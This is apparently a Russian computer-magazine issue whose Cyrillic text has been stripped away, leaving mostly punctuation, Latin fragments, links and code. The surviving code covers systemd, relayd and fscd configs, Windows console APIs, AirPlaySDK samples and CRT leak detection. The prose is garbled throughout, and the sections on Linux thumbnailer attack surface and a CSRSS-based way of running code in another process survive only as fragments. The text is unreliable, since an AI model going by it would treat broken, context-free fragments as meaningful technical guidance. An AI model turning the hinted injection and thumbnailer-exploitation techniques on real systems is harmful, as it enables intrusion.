[]: Positive Technologies
?
MaxPatrol,
- ?
( Positive Technologies)
[]: , Positive Technologies
. ,
. :
PT Cleaning Services Inc.
. MaxPatrol, ,
. PT
, Positive Research,
.
,
, .
.
MaxPatrol , PT
DVD
dvd
100% Virus Free
Podcast,
,
HTTP://WWW
links
-
PT
PT
,
- ,
. ,
. .
?
, ?
[]:
( Positive Technologies)
[]: , -
,
.
-
Positive Technologies:
ptsecurity.ru;
: sgordey.blogspot.
com;
:
devteev.blogspot.com;
Positive Hack
Days: phdays.ru.
,
.
, ,
MaxPatrol.
,
,
.
[]: C 2008
MaxPatrol. ,
, .
-
. ?
[]: MaxPatrol, XSpider,
Enterprise. -
-
.
,
. , MaxPatrol ,
.
-
, XSpider
XSpider.
[]: MaxPatrol
.
(PCI DSS)?
[]: .
[]:
?
[]: ,
.
[]: -
,
,
?
[]: , -
.
Enterprise Security.
, -
PT
Google
.
[]:
,
?
[]: . (hh.ru/
employer/26624). , . ,
, ,
.
[]: PT -
, ,
?
[]: , .
XSpider MaxPatrol
, ...
[]: , , on-site ?
[]: ,
. , Wi-Fi . ,
.
[]: , , ?
[]: . , , .
[]: Positive Technologies
?
[]: , .
.
[]: ?
[]: Positive Technologies
,
:
, .
, ,
GRC (Governance, Risk, Compliance).
Positive Technologies Security Operational Center,
.
,
, - , ERP, ()
(). , (VOIP, PBX, 3G), /SCADA.
.
,
. , ,
, .
[]:
?
[]:
SCADA-. , .
[]: , -
-. , , ,
,
?
[]: , . , , , ERP SCADA.
,
.
[]: PT PCI DSS?
[]: , PCI DSS
, . 2008 Positive Technologies
PCI DSS QSA Associate, 2006
Web PCI DSS. PCI DSS ASV. MaxPatrol
QSA ASV .
[]: .
, ?
?
[]: ,
.
:) .
[]: 2010 Google . , , ,
. ( ,
) ?
[]: , , . ,
.
Google,
, SQL Injection . fun, . Positive Technologies .
Google, .
, MaxPatrol .
, 19 2011 Positive
Hack Days, Positive Technologies.
: -,
, .
, ,
,
-, .
,
.
. z
UNIXOID
(zobnin@gmail.com)
Linux- :
/sbin/init, , ,
. ,
,
: syslogd, cron, cups , . init
: getty xdm (kdm, gdm). ,
? ,
Windows Mac OS X . ,
, .
-,
, ,
,
.
Linux Ubuntu, . ,
(Gentoo Arch, !). -
,
.
HTTP://WWW
links
systemd
: freedesktop.
org/wiki/Software/
systemd;
freedesktop.org
systemd: cgit.
freedesktop.org/
systemd;
ulatencyd:
github.com/poelzi/
ulatencyd;
fscd:
people.freebsd.
org/~trhodes/fsc.
ulatencyd
pf + relayd:
# vi /etc/pf.conf
# Redirect WWW requests from the LAN to relayd
rdr on $int_if inet proto tcp from $lan to any \
    port www tag INTWEB -> lo0 port 8080
# Pass the redirected (tagged) traffic
pass in log on $int_if inet proto tcp from $lan \
    to lo0 port 8080 flags S/SA synproxy state \
    tagged INTWEB
# vi /etc/relayd.conf
http protocol "httpfilter" {
    # TCP options
    tcp { nodelay, sack, socket buffer 65536, backlog 1000 }
    # Filter by User-Agent
    label "BAD user agent"
    request header filter "Mozilla/4.0*" from "User-Agent"
    # Filter by requested Host
    label "BAD Host request"
    request header filter "*youtube.com*" from "Host"
    request header filter "*facebook.com*" from "Host"
    # Rewrite the Accept-Language header
    request header change "Accept-Language" to "ru-ru,ru;q=0.9"
    ...
, Red Hat
PulseAudio, .
systemd,
/sbin/init, , , ,
.
Systemd ,
. 99%
INFO
fscd
,
/sbin/
init .
,
(
, , ,
,
), .
,
,
, . , cron syslog,
; syslog ,
. -
,
. Systemd
, , , , .
. Systemd
,
(
, swap,
). ,
90% ,
systemd
, .
, systemd
.
, ,
: cron
syslog, /dev/log,
info
systemd
,
gnomesession kdeinit.
, systemd
,
fscd
.
.
systemd
, .
relayd hostated
( host state,
),
.
Systemd
Fedora
. : freedesktop.
org/wiki/Software/systemd.
Systemd Ubuntu , :
/boot/grub/grub.cfg,
init=/sbin/systemd.
,
:
relayd
,
. ,
, A
B, C D, , A , . Systemd ,
,
,
. , .
, , cron syslog,
cron /dev/log
( , ),
, , , ,
, cron , .
cron
( ). (
) syslog, , , /dev/log,
- ( ),
. .
,
,
. , , CUPS ,
. ,
. Systemd ,
, ,
(
-).
,
Mac OS X , systemd
- .
, systemd Linux
:
cgroups
( , ,
umask, OOM killer, nice,
-,
).
, systemd
.
, ,
status, start, stop enable.
ulatencyd:
, ,
? ?
? ?
, , ,
,
,
.
. ,
,
,
, , .
,
. ( BeOS),
( MS), , . Linux
Linux .
, Linux, ,
, .
, ,
.
.
CFS
(Completely Fair Scheduler), 2.6.23.
, Linux (
).
Linux
200- 2.6.38, bash. Linux
,
bash- .
: Linux ,
.
, Linux (
) ulatencyd,
,
.
ulatencyd ,
, ulatencyd cgroups
, .
, ,
- .
,
( , ), .
,
,
( ) ,
.
,
.
, (
),
, .
ulatencyd,
https://github.com/poelzi/ulatencyd
cmake make:
$ cmake
$ make
$ sudo make install
:
$ sudo /usr/local/sbin/ulatencyd -v 2
, :
$ ps xaf -eo pid,session,args,cgroup
.
,
, .
relayd:
,
-? ?
, . ,
? ? .
, ,
DNS-. ? -, DNS-
( DNS-).
BIND ( ). ,
DNS-. ,
( ). -,
DNS- .
, ,
( ?). , -
systemd ( After),
syslog
.
SMTP?
? ,
- ,
.
relayd, OpenBSD 4.3,
, ,
.
3, 4 7, 7 ()
( ).
relayd ,
- SSL-
web-
web-.
,
50 .
, , .
, ,
:
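# vi /etc/relayd.conf
### Macros
# Address and port relayd listens on
relayd_addr="127.0.0.1"
relayd_port="8053"
# DNS servers to balance
# the load across
table <dns_servers> { 192.168.1.1, 192.168.1.2, 192.168.1.3 }
### Global options
# Interval between host checks
# (10 seconds)
interval 10
# Timeout for TCP checks
# (200 milliseconds)
timeout 200
# Pre-fork 5 relay processes
prefork 5
# Log host state changes
log updates
### DNS protocol settings
dns protocol "dnsfilter" {
    tcp { nodelay, sack, socket buffer 1024, backlog 1000 }
}
### Relay definition
relay dnsproxy {
    # Listen address and port
    listen on $relayd_addr port $relayd_port
    # Protocol to apply
    protocol "dnsfilter"
    # Forward requests to the DNS servers,
    # checking each of them over TCP
    forward to <dns_servers> port 53 \
        mode loadbalance check tcp
}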
.
.
relayd_flags= /etc/rc.conf.local.
FreeBSD fscd:
. fscd ,
. , ,
UNIX. FreeBSD .
( , ).
, .
, ?
. ? ,
(
). , , Solaris , , , .
FreeBSD . , FreeBSD, .
, fscd ,
, man- ,
. , fscd , , sshd, :
# fscadm enable sshd /var/run/sshd.pid
, fscd . :
/etc/rc.d ( /usr/local/etc/rc.d) /etc/
rc.conf, ( ).
fscd FreeBSD 9.0, (people.freebsd.
org/~trhodes/fsc) .
UNIX - ,
- .
UNIX, ,
. ,
UNIX, grep
syslog. z
UNIXOID
Adept (adeptg@gmail.com)
,
, .
. , OpenSource
-.
, Debian 6 ( Squeeze).
. , Debian
: x86 x86-64,
ARM (armel)
powerpc ia64 (Intel Itanium), sparc (Oracle
SPARC), mips s390 (IBM S/390).
alpha hppa (HP PA-RISC).
Kit
ConsoleKit ,
.
.
ConsoleKit ,
. ConsoleKit
.
Seat
/
( , Seat
++).
login manager,
,
Seat. , ,
$XDG_SESSION_COOKIE. ConsoleKit
.
:
$ ck-list-sessions
PolicyKit
,
.
,
PolicyKit.
,
,
root. PolicyKit sudo (,
, ) ,
,
. ,
, :
$ pkaction
# cat debian-live-6.0.0-i386-standard.iso \
> /dev/sdb
live-build,
LiveCD/LiveUSB.
(
Lenny) :
1.
Fedora Gnome3
ext4 (
ext3) ZFS ( Debian GNU/
kFreeBSD), reiserfs (
partman-reiserfs ).
2.
.
3.
SSH-.
:)
4.
firmware.
,
.
5. ( GRUB2)
Windows.
:
1. .
insserv,
( ).
2. KMS (Kernel Mode Setting
) Intel,
AMD, Nvidia. KMS
,
suspend/resume.
3. <Ctrl+Alt+Backspace>, ,
.
4. IPv6,
. IPv4 .
HTTP://WWW
links
Debian LiveCD:
live.debian.net;
ConsoleKit:
goo.gl/duKxN;
PolicyKit:
hal.freedesktop.org/
docs/polkit.
openSUSE 11.4. :
/
libzypp,
, ;
systemd ( );
OpenOffice LibreOffice;
WebYaST web- ;
HAL (Hardware Abstraction Layer) ;
Linux- 2.6.37;
DE: Gnome 2.32.2 ( Gnome3,
), KDE 4.6, Xfce 4.8;
: XOrg 7.6, Mesa 7.9, Python 2.7, Qt 4.7;
: Firefox 4, VirtualBox 4.
Unity Launcher
Mandriva-2011.
.
:
RPM5 ( RedHat);
systemd;
,
;
;
, ,
, ;
Linux- 2.6.37;
DE: KDE 4.6 DE , Gnome 2.32, Xfce 4.8;
: XOrg 7.5, GCC 4.5;
: Firefox 4, openoffice 3.3.
5. OSS . , ,
.
6.
/etc/default/keyboard.
7. DE: KDE SC 4.4.5, GNOME 2.30 ( 2.32), Xfce 4.6, LXDE 0.5.0.
8. : OpenOffice.org 3.2.1,
Iceweasel (Firefox) 3.5.16.
:
1. Linux 2.6.32 Xen 4.0.1 (dom0 domU).
2. : GCC 4.4.5, X.Org 7.5.
3. : OpenSSH 5.5p1, Apache 2.2.16, MySQL
5.1.49, PostgreSQL 8.4.6, Samba 3.5.6.
4. : Python 2.6.6 (3.1.3 ),
Perl 5.10.1, PHP 5.3.3, Ruby 1.9.1.
5. glibc eglibc (Embedded GLIBC, ),
, glibc.
6. LDAP ( libnss-ldapd, libpam-ldapd nslcd).
7.
DebSrc 3.0,
(
).
8. dpkg. XZ
( LZMA2). dpkg perl.
9. ConsoleKit PolicyKit (.
Kit ).
10. DNSSEC (
, KDE
DNS-) DNS-
BIND9. OpenDNSSEC
DNSSEC- .
Debian - :
1. Debian Backports (
)
backports.debian.org.
2. Debian Squeeze debian.org, 13 (!) .
: packages.debian.org, wiki.
debian.org . , , ,
, : replay.waybackmachine.org/20100830160456/http://
www.debian.org.
Debian . ,
.
non-free.
Debian, Ubuntu
- .
11.04 ( Natty Narwhal) 28
. 10.04 10.10
,
.
Unity (
). Unity : ,
. , .
Unity
GlobalMenu,
. ,
, , .
,
, .
Unity Launcher. ,
, : Win ( Super).
Unity Dash,
Ubuntu . , Dash / , /
, , .
, Unity, . ,
, /, Compiz. Compiz, Unity
Software Center
gentoo Calculate Linux 11.0.
, .
:
Calculate Scratch Server;
Calculate Linux Desktop
Calculate Directory Server rolling-release;
;
Calculate Linux Desktop;
Portage 2.2;
Canon;
KMS Intel.
Clutter (
OpenGL ) Zeitgeist (
/
).
Unity
, - .
15,6" 2.
. ,
. ,
Unity Fedora
OpenSUSE .
Compiz, D-Bus , Unity.
, Unity .
- Unity , gdm Ubuntu
Classic Gnome ( Gnome Shell).
Unity , , :
1. armel
( OMAP3 OMAP4). x86
. , ARM . Canonical :)
2. Banshee.
, mono, mono . .
, Banshee , GNOME Foundation. Canonical ,
Canonical :).
, Banshee Ubuntu
, 25% GNOME Foundation.
3. LibreOffice 3.3 OpenOffice.
Debian
4. Software Center .
5. Ubuntu One Shotwell.
6. Shotwell 0.8 ( , YouTube,
Flickr, Facebook, PicasaWeb .).
7. Linux 2.6.38.
8. : GCC 4.5, X.Org 7.6.
9. DE: KDE 4.6, Gnome 3, Xfce 4.8, LXDE 0.5.0.
10. , , ,
Wayland.
RPM-based
Red Hat Enterprise Linux 6,
2020 .
:
1. Linux 2.6.32 ,
.
RHEL6,
. ABI- .
CFS (Completely Fair Scheduler). , ( / ). ,
2-5 .
2. SysV init upstart.
3. KVM,
.
Xen Dom0 , Xen DomU (
). SPICE (Simple
Protocol for Independent Computing Environments),
.
SPICE VNC (Virtual Network Computing) RDP
(Microsoft Remote Desktop Protocol) - ,
. , ,
;
4.
PCI Express.
5. ext4.
XFS, NFSv4
Btrfs.
6. System Security Services Daemon (SSSD) - . LDAP, Kerberos .
: (offline mode).
7. , , ,
.
Ubuntu One
,
.
8. : GCC 4.4, X.Org 7.5.
9. DE: KDE 4.3.4, Gnome 2.28.6.
10. : Apache 2.2.15, MySQL 5.1.47,
PostgreSQL 8.4.4, Samba 3.5.4.
11. : PHP 5.3.2, Python 2.6.5.
RHEL .
CentOS. CentOS 6
, -. ,
. OSS-
Scientific Linux 6 (scientificlinux.org).
. CERN ( ,
) .
RHEL 6:
IceWM;
OpenAFS ;
revisor, livecd-tools liveusb-creator LiveCD/LiveUSB;
yum-autoupdate .
,
Scientific Linux, . Oracle , RHEL 6, Oracle Linux 6. RHEL . Unbreakable
Enterprise Kernel ( 64- ),
, , Oracle, :).
,
. ( 8.1)
FreeBSD 8.2 7.4. 7.4 -
eth0, em1
: , ( : Atheros AR8151/
AR8152, Broadcom BCM5718, SiS190/191 ).
.
FreeBSD 8.2 :
1. ZFS 15 , OpenSolaris , ZFS.
2. geli
,
. AES-XTS,
geli .
3. netgraph-, .
4. , USB 3.0 (xhci).
5.
CPU Intel.
6. (Atheros AR8151/AR8152
PCIe Gigabit/Fast Ethernet, Intel 10Gb Ethernet 82599 Broadcom
BCM5718) (Intel Wireless WiFi Link 6000, Broadcom
BCM430* BCM431*) .
7. DTrace , .
8. tar LZMA.
9. FreeBSD x86-64
Xen HVM.
changelog :
1. ,
- , (,
upstart systemd).
2. , HAL.
3. D-Bus (.
][ 2010 ,
xakep.ru/post/54722/default.asp).
4.
LibreOffice. , Debian
.
5. ext4.
- , , btrfs.
6. , Wayland XOrg. z
UNIXOID
iv (ivinside.blogspot.com)
WINDOWS
Linux
.
. ,
:
.
Autorun.inf ,
.autorun!
, , Windows
usb-
.
autorun.inf,
,
. , Windows 7, . .
( Stuxnet) ,
.
, .
freedesktop.org,
, GNOME KDE, : .autorun, autorun
autorun.sh. , .
.autorun, , .
40 960 evince-thumbnailer
libc
Ubuntu
1. AppArmor Linux,
.
,
. Ubuntu
AppArmor.
apparmor-profiles.
/usr/share/doc/apparmor-profiles/extras,
/etc/apparmor.d.
2. ASLR (Address Space Layout Randomization)
.
ELF
, ,
. /proc/sys/kernel/
randomize_va_space (1
2) (0) ASLR. 2005 (
2.6.12) Linux
ASLR. (PaX, ExecShield
)
ASLR. , Hardened, Ubuntu
.
3. PIE (Position Independent Executables)
-fPIE pie.
ASLR
.
32- ,
( 10%).
4. NX (No eXecute Bit)
, ,
.
:
,
( Intel Pentium 4 6xx AMD Athlon 64);
PAE x86-64 (
).
, autorun.inf Windows,
.
,
,
. , (,
Evince
pdf) .
.autoopen autoopen
, , . , Nautilus
(?) .
.
?
.
,
, . (
) :
USB, eSATA, FireWire, PCMCIA;
(ext3, ext4
);
(ntfs-3g);
(
).
.
, 2009 VoIP
Auerswald (CVE-2009-4067).
USB- .
.
USB-
, QEMU
USB-. 2009
ext4,
ext4_decode_error(),
NULL-
.
, .
,
.
( FUSE)
, .
HTTP://WWW
links
,
-
:
goo.gl/2wIIA;
,
: cve.mitre.org/
cve/cve.html;
: youtube.
com/watch?v=
ovfYBa1EHm4;
, Ubuntu:
wiki.ubuntu.com/
Security/Features.
DVD
dvd
DVD
ShmooCon 2011,
, ,
.
Nautilus ,
? :
1. . , .
2. (lint, clang static analyzer ).
3. . ( )
. , , , ,
,
. , , ( smart fuzzing).
,
.
! Nautilus
, ,
. GdkPixBuf,
,
libpng, libtiff, libjpeg. . 2011
libpng < 1.5.0 (CVE-2011-0408),
png_do_expand_palette() png_do_rgb_to_gray(). pngrtran.c. PNG-, MNG- JNG-
,
ShmooCon. , PoC-
,
1.5.1. 2010 LibTIFF 3.x, TIFF-
SubjectDistance.
3.9.4. FreeType < 2.4.3,
TrueType GX. ft_var_readpackedpoints().
, Linux .
:
evince-thumbnailer pdf;
totem-video-thumbnailer - ;
gnome-thumbnail-font .
, evincethumbnailer :
Evince PDF-.
, PostScript, TIFF, DVI, DjVu.
GNOME.
Common Vulnerabilities and Exposures, ,
Evince ,
2010 . (CVE2010-2640) ,
, .
Ubuntu
10.10 (
kill.sh
killall gnome-screensaver).
DVI-.
,
(/media/NNN). ,
, Nautilus
.
Nautilus
'-s' , PDF-,
. Nautilus
.
:
$ gconftool -R /desktop/gnome/thumbnailers
, :
. ,
AppArmor Ubuntu 10.10, totem-videothumbnailer gnome-thumbnail-font. ,
Ubuntu . ,
, ,
, . Ubuntu
,
. , .
Ubuntu :
AppArmor, ASLR, PIE, NX-.
,
(ret2lib) - (ROP).
ShmooCon 2011 ASLR/PIE
32- Linux. ,
libc ( ), , 3 000 , .
,
( ,
). , , pdf-,
evince-thumbnailer. ,
Nautilus evincethumbnailer.
AppArmor ,
, /etc/apparmor.d.
, Ubuntu 10.10 evince-thumbnailer
~/.config/autostart ,
(
) . AppArmor ,
Nautilus
:
X11 ( );
, ,
.
,
, :
1. . Linux
, Windows, .
.
2. (
) Nautilus .
Nautilus Edit -> Preferences -> Media
Browse media when inserted.
3. .
Nautilus, . Nautilus
Edit Preferences Preview.
4. AppArmor ,
.
Skype, , .
5. PaX,
,
. PaX ASLR,
.
6. 64- , ASLR ,
. , 64
,
x86-64 .
7. Ubuntu (
), ,
, , .
, Linux , ,
Ubuntu. ,
:
- Linux
Windows. z
CODING
(stannic.man@gmail.com)
? , ,
.
. ,
.
, .
,
.
Windows
, , ( ), , LPC/RPC, COM, -.
- ,
( ru.wikipedia.org/wiki/_). , ,
,
.
CSRSS.
? , . ,
API- AllocConsole. (
) AttachConsole
.
: - ,
csrss.exe. , ,
, ,
() . SetConsoleCursorInfo, SetConsoleCursorPosition,
SetConsoleTitle ( Get-).
, csrss.exe
. ? ( )
65535 ,
. ,
,
,
CSRSS
. ,
.
CTRL+C
?
,
CTRL+C,
?
CTRL+ . CTRL_C_EVENT,
CTRL+C.
CTRL_BREAK_EVENT, . CTRL_CLOSE_EVENT, , ,
. CTRL_LOGOFF_EVENT
, .
, CTRL_SHUTDOWN_EVENT, ,
.
API GenerateConsoleCtrlEvent.
,
CTRL-, ,
- . kernel32.
dll!SetConsoleCtrlHandler,
CTRL-.
.
.
?
, ,
,
? ,
, ,
, ,
AllocConsole. winsrv!SrvAllocConsole. ,
,
kernel32!CtrlRoutine
kernel32!PropRoutine (
CsrClientCallServer
0x20224).
- CTRL- CSRSS
(!)
: winsrv!ProcessCtrlEvents
winsrv!CreateCtrlThread winsrv!InternalCreateCallba
ckThread kernel32!CreateRemoteThread.
CtrlRoutine.
, CSRSS ,
,
.
CreateThread(Ex).
,
: ,
, Ctrl+C Ctrl+Break,
. API-
.
CSRSS,
CreateThread(Ex).
:
HTTP://WWW
links
MSDN:
http://goo.gl/bTwhz.
, MSDN!
INFO
info
?
IDA
Pro WinDbg
!
AllocConsole();
SetConsoleCtrlHandler( threadHandler1,TRUE );
SetConsoleCtrlHandler( threadHandler2,TRUE );
GenerateConsoleCtrlEvent( CTRL_C_EVENT,
GetCurrentProcessId() );
// Handlers run in reverse order of registration; first:
// threadHandler2(CTRL_C_EVENT)
// then:
// threadHandler1(CTRL_C_EVENT)
SetConsoleCtrlHandler( threadHandler1, FALSE );
SetConsoleCtrlHandler( threadHandler3, TRUE );
GenerateConsoleCtrlEvent(CTRL_BREAK_EVENT,
GetCurrentProcessId());
//
// threadHandler3(CTRL_BREAK_EVENT)
//
// threadHandler2(CTRL_BREAK_EVENT)
FreeConsole();
, ? .
:).
, API- AttachConsole
. ,
,
.
,
.
API-
AttachConsole CreateRemoteThread!
, :
;
;
AllocConsole();
AttachConsole();
SetConsoleCtrlHandler( threadHandler, TRUE );
GenerateConsoleCtrlEvent(CTRL_BREAK_EVENT,
GetCurrentProcessId());
threadHandler.
:
CTRL_C_EVENT , CTRL_BREAK_EVENT. ,
GenerateConsoleCtrlEvent
,
.
,
winsrv!SrvAllocConsole
CtrlRoutine PropRoutine.
CtrlRoutine ,
PropRoutine? PropRoutine
. , ,
. ,
,
.
, , (
winsrv!ConsoleWindowProc)
:
uMsg = WM_SYSCOMMAND
wParam = 0xFFF7
lParam = undefined
?
: NtCreateSection,
NtMapViewOfSection,
.
NtUnmapViewOfSection, NtDuplicateObject,
(
!)
CreateRemoteThread
PropRoutine .
, PropertiesDlgShow , winsrv!ConsoleWindowProc
.
,
- ,
PropertiesDlgShow.
? , :
- ,
, DLL ,
LoadLibraryW, (!) , ,
(
! . ) .
console.dll ,
.
, kernel32!PropRoutine,
API- CreateThread(Ex).
AllocConsole/AttachConsole , ,
AllocConsole().
, ,
:
SendMessage (hConsole, WM_SYSCOMMAND, 0xFFF7, 0)
hConsole HWND,
GetConsoleHandle().
?
kernel32!CtrlRoutine ,
, kernel32!PropRoutine
, . , ,
,
.
console.dll, , .
Windows XP console.dll
, ,
. Windows Vista
. ,
Windows , - .
console.dll \system32\, . .
! , ,
.
? , ,
,
! ... ][ ! ,
! z
CODING
herfleisch (perechnev.com)
iOS, Android, Bada, Symbian WM
AirPlaySDK
, , .
- , ,
. , ,
.
?
DVD
dvd
HTTP://WWW
links
AirPlaySDK
,
:
airplaysdk.com.
HelloWorld.mkb
options {
s3e-data-dir="data"
}
files {
(source)
HelloWorld.cpp
HelloWorld.h
HelloWorldMain.cpp
}
subprojects {
iw2d
}
s3e-data-dir options
,
. ,
- . data
HelloWorld. files
. source,
. :
HelloWorld.cpp, HelloWorld.h HelloWorldMain.cpp.
subprojects , .
Hello World!
, , .
HelloWorld.mkb
AirPlaySDK. ? , Visual Studio.
HelloWorldMain.cpp ,
HelloWorldMain.cpp, , .
HelloWorldMain.cpp
#include "s3e.h"
#include "HelloWorld.h"

int main() {
    GameInit();
    while (true)
    {
        s3eDeviceYield(0);      // yield to the OS
        s3eKeyboardUpdate();    // refresh the key state
        bool result = GameUpdate();
        if ((result == false) ||
            (s3eKeyboardGetState(s3eKeyEsc) &
                S3E_KEY_STATE_DOWN) ||
            (s3eKeyboardGetState(s3eKeyLSK) &
                S3E_KEY_STATE_DOWN) ||
            (s3eDeviceCheckQuitRequest()))
            break;
        GameRender();
    }
    GameShutdown();
    return 0;
}
#include s3e.h
AirPlaySDK,
. GameInit() .
,
,
.
s3eDeviceYield(..)
.
,
, . s3eKeyboardUpdate()
,
-
. GetUpdate()
.
.
,
Visual
Studio :
dreamspark.com.
INFO
info
AirPlaySDK
,
GPS, , , ,
.
WARNING
warning
,
.
,
,
][ :).
HelloWorld-
,
. true, , false, , , . ,
,
,
( ).
. GameRender(), ,
. , , GameShutdown() (
) ,
, .
, . , HelloWorldMain.cpp . ,
AirPlaySDK.
, .
HelloWorld.cpp HelloWorld.cpp:
HelloWorld.cpp
#include "Iw2D.h"
void GameInit() {
Iw2DInit();
}
bool GameUpdate() {
return true;
}
void GameRender() {
Iw2DSetColour(0xFF000000);
Iw2DFillRect(
CIwSVec2(0, 0),
CIwSVec2(Iw2DGetSurfaceWidth(),
Iw2DGetSurfaceHeight())
);
Iw2DSetColour(0xFF00FF00);
Iw2DFillArc(
CIwSVec2(Iw2DGetSurfaceWidth()/2,
Iw2DGetSurfaceHeight()/2),
CIwSVec2(30, 30),
0, 0x800 * 2
);
Iw2DSurfaceShow();
}
void GameShutdown() {
Iw2DTerminate();
}
AirPlaySDK
, HelloWorld.cpp ,
. .
.
HelloWorld.h,
main(). :
HelloWorld.h
#ifndef HELLOWORLD_H
#define HELLOWORLD_H
void GameInit();
bool GameUpdate();
void GameRender();
void GameShutdown();
#endif
. ,
, F5 Visual
Studio. , AirPlaySDK.
CODING
deeonis (deeonis@gmail.com)
memory leaks
,
TLS
, . -.
. ,
C++ MSVC.
Windows,
Microsoft.
,
, . , .
exception delete.
, ,
, .
:
.
( ), - ,
Debug CRT.
Debug CRT
Debug CRT
Debug Heap Alloc Map.
:
Debug CRT
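#ifdef _DEBUG
// _CRTDBG_MAP_ALLOC must be defined before <crtdbg.h> is included,
// otherwise malloc()/free() are not mapped to their debug versions
#define _CRTDBG_MAP_ALLOC
#include <stdlib.h>
#include <crtdbg.h>
#endif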
new
malloc()
_CrtMemBlockHeader.
, ,
.
, .
_CrtMemBlockHeader
typedef struct _CrtMemBlockHeader
{
,
_CrtDumpMemoryLeaks(). ,
. , ,
,
. :
_CrtDumpMemoryLeaks()
Detected memory leaks!
Dumping objects ->
{163} normal block at 0x00128788, 4 bytes long.
Data: < > 00 00 00 00
{162} normal block at 0x00128748, 4 bytes long.
Data: < > 00 00 00 00
Object dump complete.
, , .
, , -
. -
_CrtDumpMemoryLeaks(). :
_CrtDumpMemoryLeaks()
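#include <tchar.h>
#include <crtdbg.h>

int _tmain(int argc, _TCHAR* argv[])
{
    _CrtMemState _ms;
    // snapshot of the debug heap before the code under test
    _CrtMemCheckpoint(&_ms);
    // some logic goes here...
    // dump every block allocated after the checkpoint
    _CrtMemDumpAllObjectsSince(&_ms);
    return 0;
}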
_CrtMemCheckpoint(), , _CrtMemDumpAllObjectsSince(), ,
, .
, Debug CRT,
. ,
, .
Valgrind
.
Visual Leak Detector . ,
. ReportTo.
debugger, file both.
, .
,
ReportFile.
ReportEncoding: unicode ASCII.
(SelfTest). , . ,
output - :
ERROR: Visual Leak Detector: Detected a memory leak
internal to Visual Leak Detector.
VLD ,
, ,
. ,
, .
Visual Leak Detector ,
.
Valgrind
, , Windows
MS Visual Studio. . Valgrind .
Linux Mac OS X
, (
). , Valgrind
, JIT-.
, . Valgrind.
, , .
Valgrind .
( 4-5 ) . .
, Valgrind . Memcheck.
C . Memcheck , /
, .
, Addrcheck , Memcheck.
Helgrind DRD
. , Valgrind ,
.
.
. ,
memory leaks. z
SYN/ACK
grinder (grinder@tux.in.ua)
SaaS
, IT- .
( ) -,
. , , , , .
SaaS?
. M- , . ,
. , , . ,
(, , )
,
,
. , , , , .
, CRM, ,
. , IT-,
,
. , ,
. . ,
CRM-,
. .
,
, ,
. , ,
. VPN
,
, .
- ,
- . , , ,
.
(SaaS, Software
as a Service) .
,
.
, , ,
.
( , ).
,
, .
, SaaS,
.
, SaaS,
.
, .
, ,
. ,
,
. ,
.
, , .
. (pdd.yandex.ru). ( , .) MX-
. . ,
. POP3/IMAP, -
.
., .
. 1000 ,
( - ),
. , .
, ,
.
, . Google Apps (google.com/apps/intl/ru/business) GMail
,
, , , Google.
2 .
, GMail. .
(50$ ) 25 ,
, ,
Gmail, API-, -. ,
Postini, ,
TLS, ,
, . . ,
Google Apps. ,
API, Google Apps Marketplace (google.com/enterprise/marketplace).
Google Apps.
,
, ,
, , VoIP
. API , ,
. ,
Apps Marketplace .
.
NextMail (nextcorp.ru), is-mail.biz
.
,
, .
( )
.
.
Talent management HCM (Human Capital Management)
.
. SaaS
Taleo (taleo.com)
SuccessFactors (successfactors.com).
,
, , .
Facebook LinkedIn (linkedin.com),
. LinkedIn
, 85 000 000
.
.
,
.
.
,
:). Dr.Web AV-Desk (drweb.com/saas/find_provider/biz), Kaspersky Subscription Services (kaspersky.ru/kss),
Outpost AV Service (agnitum.ru/purchase/av-service)
ESET NOD32 (esetnod32.ru/.solutions/isp/list).
, , . Windows
. ,
. , Dr.Web x86 ,
, -,
,
. ,
, 2011, Kaspersky Internet Security 2011
Kaspersky CRYSTAL
.
,
.
,
, , , .
- McAfee, F-Secure
Panda web-
.
Panda Panda
Cloud Antivirus (cloudantivirus.com/ru),
.
, , ,
, .
INFO
info
CRM
][
04.2011.
Cisco WebEx
Panda Cloud Protection (cloudprotection.pandasecurity.com), Panda Cloud Office Protection, Panda Cloud
Email Protection Panda Cloud Internet Protection.
, -
. .
Panda Cloud Office Protection . , , , /IM HTTP/FTP-;
, IDS,
, HIPS. Panda Cloud
Antivirus. -, Panda Cloud Office Protection
. , . ,
, .
F-Secure Protection Service for
Business (f-secure.com/en_US/products/business/security-as-aservice/) McAfee SaaS Endpoint Protection (mcafeeasap.com/SC).
Cisco Webex
.
,
. , .
-, . Cisco,
2007 Webex, Cisco Webex
(webex.com), - . , Cisco Webex
50% . , ,
, , ,
(IM, , VoIP, ). , , , .
MS Office
.
iGoogle ,
,
.
Google Apps
Marketplace
, URL,
Meeting Center.
,
. : 640x360@30fps.
. , .
Webex
, -. (BlackBerry, Symbian, Windows Mobile Apple iOS).
, , ,
.
,
$49 ,
25 .
Cisco Webex Adobe Connect
(adobeconnect.ru), Microsoft Office Live Meeting (microsoft.com/online/office-live-meeting.aspx), Skype .
Citrix GoToMeeting
(gotomeeting.com), 2004 . -,
( VoIP),
. ,
,
CRM NetSuite
.
GoToMeeting ( 15 ), GoToWebinar
( 1000 ) GoToMeeting
Corporate.
CRM ERP
,
CRM (Customer Relationship Management System,
). CRM ][ 04.2011.
,
, SaaS
. ,
, , . - (
), ,
. SSL. - ,
. , SaaS , .
Gartner SaaS,
CRM . ,
SaaS CRM . NetSuite CRM
(netsuite.com), Salesforce (salesforce.com) (megaplan.ru). , NetSuite CRM 2009
Gartner -20 CRM- ,
Salesforce . SaaS, , CRM ,
.
SaaS
. , NetSuite CRM
: , ,
,
, ,
. CRM+
, , , ,
.
-, , , . CRM+
CMS, -,
CRM. ,
CRM.
smbXML (Small
Business Extensible Markup Language) -. NS-BOS,
, NetSuite.
, NetSuite ,
SaaS ERP ( (PSA), ), OneWorld (ERP
,
), OpenAir
myDIALS.
NetSuite, CRM,
,
-,
.
, CRM .
SaaS-, BigMachines
(bigmachines.com) .
BigMachines CRM- ERP-.
() . ,
, ,
, - . z
SYN/ACK
(polygaev@gmail.com, ICQ 284491726)
ERP -
-?
hardware- software- , . ,
, ,
.
, - , ERP-.
ERP: ERP- (. Enterprise Resource Planning System,
) ( ,
, - ).
(-)
. , ,
, ERP- .
ERP-,
.
, , ERP-
.
ERP
( -)
.
, .
:
-.
, ERP ,
ERP-. ,
- ( ) (,
-). ERP
- .
, ,
ERP-,
,
. , , , - N ERP-.
,
:
,
;
, ,
( );
: ( ), ( N M), ( N M);
- , ,
ERP,
, : ,
N
ERP-.
ERP: ,
( , , ERP ).
:
, , ,
;
ERP ;
,
ERP,
.
. ( ) 34,
. ,
80- ,
.
.
ERP .
. scope
,
-, .
- 1,
- SAP. ,
, , -,
,
. .
,
